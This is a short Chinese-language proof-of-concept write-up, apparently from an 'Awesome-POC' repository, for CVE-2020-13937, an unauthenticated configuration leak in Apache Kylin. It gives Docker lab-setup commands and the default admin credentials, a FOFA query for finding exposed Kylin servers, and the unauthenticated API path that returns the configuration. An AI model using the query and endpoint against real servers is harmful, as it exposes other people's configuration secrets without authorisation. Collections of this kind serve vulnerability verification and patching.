Awesome-POC/Web服务器漏洞/Apache Kylin config 未授权配置泄露 CVE-2020-13937.md
2022-05-25 16:51:48 +08:00

41 lines
811 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache Kylin config 未授权配置泄露 CVE-2020-13937
## 漏洞描述
Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息
## FOFA
```
app="APACHE-kylin"
```
## 环境搭建
```
docker pull apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
```
打开后使用默认账号密码admin/KYLIN登录出现初始界面即为成功
![image-20220525161044773](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251610838.png)
## 漏洞复现
漏洞验证POC
```
/kylin/api/admin/config
```
![image-20220525161140820](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251611885.png)